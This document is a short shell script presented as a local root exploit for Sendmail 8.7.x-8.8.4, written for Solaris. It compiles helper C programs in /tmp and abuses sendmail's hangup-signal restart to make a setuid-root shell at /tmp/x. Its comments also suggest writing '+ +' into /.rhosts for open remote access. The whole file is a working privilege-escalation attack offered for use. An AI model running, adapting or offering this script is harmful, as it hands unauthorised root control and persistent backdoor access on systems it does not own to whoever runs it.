#/bin/sh
#
# Spac3D0g's Sendmail 8.7.x-8.8.4 root 'sploit.
# (Rewritten from Leshka's to support Solaris)
#
# Tested on Solaris 2.5, 2.5.1, other OS's too..
# 
# Should create a suid program /tmp/x that calls shell as root.
#
# Modify RUN in x.c for what you wanna run, and possibly the location
# or format of the ps command in the KILL line below for your platform.
#
# Or you could remove x.c alltogether and just put what you wanna do as
# root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
#
#
cat << _EOF_ >/tmp/x.c
 #define RUN "/bin/ksh"
 #include<stdio.h>
 main()
 {
    execl(RUN,RUN,NULL);
 }
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
 main()
 {
   execl("/usr/lib/sendmail","/tmp/smtpd",0);      
 }                                             
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
 main()
 {
   setuid(0); setgid(0); 
   system("chown root /tmp/x ;chmod 4755 /tmp/x");
 }
_EOF_
#
#
gcc -O  -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
   echo "leet..."
   /tmp/x
fi